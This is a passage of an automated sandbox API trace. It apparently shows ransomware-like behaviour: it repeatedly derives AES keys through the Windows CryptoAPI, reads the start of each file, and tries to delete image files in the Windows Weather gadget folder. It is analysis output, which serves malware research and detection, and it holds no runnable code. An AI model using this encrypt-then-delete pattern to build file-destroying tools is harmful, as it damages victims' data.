returned 1 [0195.191] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.191] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xafe [0195.191] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.194] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.194] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.194] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.196] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-horizontal.png")) returned 0 [0195.197] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.198] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.198] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.198] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.198] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xafd [0195.198] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.201] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.201] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.201] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.203] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-vertical.png")) returned 0 [0195.204] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.205] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.205] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.205] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.205] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2261 [0195.205] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.209] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.209] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.209] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.210] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked-loading.png")) returned 0 [0195.212] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.212] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.212] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.213] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.213] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x274e [0195.213] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.217] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.217] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.217] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.218] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_cloudy.png")) returned 0 [0195.219] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.220] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.220] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.220] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.220] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2685 [0195.220] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.251] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.251] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.251] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.253] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_few-showers.png")) returned 0 [0195.327] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.327] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.327] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.327] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.327] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2930 [0195.327] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.331] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.331] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.331] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.333] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_foggy.png")) returned 0 [0195.333] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.334] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.334] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.334] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.334] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e6a [0195.334] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.338] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.338] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.338] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.340] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_hail.png")) returned 0 [0195.342] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.342] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.342] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.342] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.342] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2174 [0195.342] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.356] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.356] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.356] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.358] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter.png")) returned 0 [0195.358] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.359] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.359] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.359] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.359] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ace [0195.359] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.364] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.364] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.364] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.366] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png")) returned 0 [0195.367] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.368] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.368] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.368] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.368] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2264 [0195.368] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.432] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.432] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.432] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.434] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full.png")) returned 0 [0195.435] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.435] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.435] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.435] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.435] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b2d [0195.436] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.440] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.440] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.440] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.442] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full_partly-cloudy.png")) returned 0 [0195.445] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.446] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.446] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.446] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.446] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21ad [0195.446] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.460] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.461] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.461] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.468] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter.png")) returned 0 [0195.468] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.469] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.469] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.469] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.469] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b86 [0195.470] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.474] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.474] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.474] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.477] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png")) returned 0 [0195.480] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.481] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.481] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.481] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.481] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x251a [0195.481] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.511] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.511] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.511] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.513] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new.png")) returned 0 [0195.514] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.515] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.515] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.515] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.515] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2d6f [0195.515] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.518] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.518] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.518] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.520] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new_partly-cloudy.png")) returned 0 [0195.521] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.522] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.522] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.522] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.522] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2334 [0195.522] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.552] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.552] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.552] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.553] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent.png")) returned 0 [0195.553] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.554] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.554] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.554] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.554] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c73 [0195.554] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.578] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0195.578] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.578] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.579] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png")) returned 0 [0195.580] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.581] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.581] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.581] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.581] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21bc [0195.581] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0195.590] CryptDestroyHash (hHash=0x284d528) returned 1 [0195.590] CryptDestroyKey (hKey=0x284d568) returned 1 [0195.590] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0195.592] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous.png")) returned 0 [0195.592] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0195.593] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0195.593] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.593] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0195.593] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b35 [0195.593] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: 